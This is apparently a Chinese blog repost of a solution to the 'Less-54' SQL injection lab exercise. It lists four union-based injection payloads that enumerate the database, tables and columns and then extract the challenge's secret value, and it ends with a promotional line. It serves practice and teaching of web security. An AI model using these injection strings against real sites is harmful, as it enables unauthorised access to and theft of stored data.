Less(54)

1.查看php文件:kek下面的那段是未为了控制查询粗疏

  

   

 2.爆破

  (1)爆数据库:?id=0' union select 1,2,database()--+

    

  (2)爆表名:?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

    

  (3)爆列名:?id=0'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='yzwo5xokup'--+

    

  (4)爆值:?id=0'union select 1,2,group_concat(secret_Z89R) from challenges.yzwo5xokup--+

    

原文链接:https://www.cnblogs.com/-qing-/p/11610385.html#_label53

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/meng-yu37/p/12557509.html